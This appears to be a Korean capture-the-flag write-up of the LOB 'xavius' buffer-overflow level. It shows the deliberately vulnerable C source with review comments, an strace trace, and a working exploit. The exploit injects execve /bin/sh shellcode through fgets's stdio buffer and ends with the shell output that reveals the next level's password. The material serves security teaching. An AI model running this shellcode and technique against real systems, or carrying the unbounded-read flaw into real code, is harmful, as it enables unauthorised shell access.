
[nightmare@localhost nightmare]$ cat xavius.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - xavius

        - arg

*/


#include <stdio.h>

#include <stdlib.h>

#include <dumpcode.h>


/*
 * Deliberately vulnerable challenge program (LOB "xavius").
 *
 * Reads one line from stdin into a 40-byte stack buffer with a 256-byte
 * limit, then tries to reject an overwritten return address that points into
 * the stack, the program image, or a library function, and finally wipes
 * large parts of the stack before returning.
 *
 * Notes for readers:
 *  - main() is declared without a return type (pre-C99 implicit int), and
 *    memcpy/memcmp/memset are called without a prototype because <string.h>
 *    is not included; <dumpcode.h> is a challenge-local header, not part of
 *    the standard library.
 *  - Everything below depends on the exact 32-bit stack layout this binary
 *    was built for: a fixed frame offset for buffer, the saved return address
 *    assumed at buffer+44, and the stack top assumed at 0xbfffffff. It is not
 *    portable and is not meant to be.
 */
main()

{

char buffer[40];   // 40 bytes, but up to 255 bytes are written into it below

char *ret_addr;    // the 4 bytes at buffer+44: what the program treats as the (overwritten) return address


// overflow!
// fgets is bounded by its size argument, not by the array, and 256 > sizeof buffer,
// so input past 40 bytes overwrites the rest of the frame. The defensive form
// would be fgets(buffer, sizeof buffer, stdin).

fgets(buffer, 256, stdin);

printf("%s\n", buffer);


// Filter 1: high byte of the assumed return address is 0xbf, i.e. an address
// in the stack region (the strace in this write-up shows the stack near
// 0xbffff964). Such a return address is rejected.

if(*(buffer+47) == '\xbf')

{

printf("stack retbayed you!\n");

exit(0);

}


// Filter 2: high byte 0x08, i.e. an address inside the program image
// (brk(0) in the trace returns 0x8049a58, so the image lives at 0x08xxxxxx).

if(*(buffer+47) == '\x08')

        {

                printf("binary image retbayed you, too!!\n");

                exit(0);

        }


// check if the ret_addr is library function or not
// Filter 3: copy the 4 address bytes out of the input and scan forward from
// that address until a "\x90\x90" pair is found; if a "\xc9\xc3" (leave; ret)
// sequence is met first, the target is treated as a library function epilogue.
// NOTE(review): ret_addr comes straight from untrusted input and is
// dereferenced with no range or mapping check. A value pointing at unmapped
// memory crashes the process here, and a byte-pattern scan cannot establish
// what region the address actually belongs to, so this filter is not a
// reliable control. The real mitigation is the bounded read above.

memcpy(&ret_addr, buffer+44, 4);

while(memcmp(ret_addr, "\x90\x90", 2) != 0) // end point of function

{

if(*ret_addr == '\xc9'){ // leave

if(*(ret_addr+1) == '\xc3'){ // ret

printf("You cannot use library function!\n");

exit(0);

}

}

ret_addr++; 

}

        // stack destroyer
        // Zero the input buffer below the return-address slot (bytes 0..43),
        // then everything above that slot up to 0xbfffffff, the assumed top of
        // a 32-bit stack (argv/envp included). The pointer-to-int cast is only
        // meaningful on a 32-bit target; on a 64-bit build it truncates.

        memset(buffer, 0, 44);

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));


// LD_* eraser

// 40 : extra space for memset function
// Zero 2960 bytes below the buffer (buffer-3000 .. buffer-41), leaving the
// last 40 bytes untouched so memset's own frame is not overwritten while it
// runs. Writing below the current frame is itself out of bounds and only
// "works" because of the fixed layout noted above.

memset(buffer-3000, 0, 3000-40);

}


소스를 보고 뭘 어떻게 해야 하지 생각했는데, fgets에 뭔가 있겠다 싶어서 strace로 syscall을 추적해 보았다.


<c.f) strace >

http://www.joinc.co.kr/modules/moniwiki/wiki.php/man/1/strace



[nightmare@localhost /tmp]$ strace ./xavius 

execve("./xavius", ["./xavius"], [/* 24 vars */]) = 0

brk(0)                                  = 0x8049a58

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000

open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)

open("/etc/ld.so.cache", O_RDONLY)      = 3

fstat(3, {st_mode=S_IFREG|0644, st_size=12210, ...}) = 0

old_mmap(NULL, 12210, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40015000

close(3)                                = 0

open("/lib/libc.so.6", O_RDONLY)        = 3

fstat(3, {st_mode=S_IFREG|0755, st_size=4101324, ...}) = 0

read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\212"..., 4096) = 4096

old_mmap(NULL, 1001564, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000

mprotect(0x40105000, 30812, PROT_NONE)  = 0

old_mmap(0x40105000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0xec000) = 0x40105000

old_mmap(0x40109000, 14428, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40109000

close(3)                                = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_WRITE) = 0

mprotect(0x40018000, 970752, PROT_READ|PROT_EXEC) = 0

munmap(0x40015000, 12210)               = 0

personality(PER_LINUX)                  = 0

getpid()                                = 762

fstat64(0, 0xbffff964)                  = -1 ENOSYS (Function not implemented)

fstat(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40015000

ioctl(0, TCGETS, {B9600 opost isig icanon echo ...}) = 0

read(0, 

"\n", 1024)                     = 1

fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40016000

ioctl(1, TCGETS, {B9600 opost isig icanon echo ...}) = 0

write(1, "\n", 1

)                       = 1

write(1, "\n", 1

)                       = 1

munmap(0x40016000, 4096)                = 0

_exit(-1073746168)                      = ?

[nightmare@localhost /tmp]$ 

0x40015000에서 뭔가 하는 걸 알 수 있었다. 풀고 나서 찾아보니까 fgets가 사용하는 특수 버퍼라 한다.


[payload]

\x90[10] | shellcode[24] | \x90[10] | RET(0x40015001) |

+) \x00이 들어가면 null로 인식하기 때문에 NOP로 감싸 주고 \x01로 넣어 주었다.

[attack]

[nightmare@localhost nightmare]$ (python -c 'print "\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x90"*10+"\x01\x50\x01\x40"';cat) | ./xavius

??????????1픐h//shh/bin??S??

                              것€??????????P@





my-pass

euid = 519

throw me away


성공

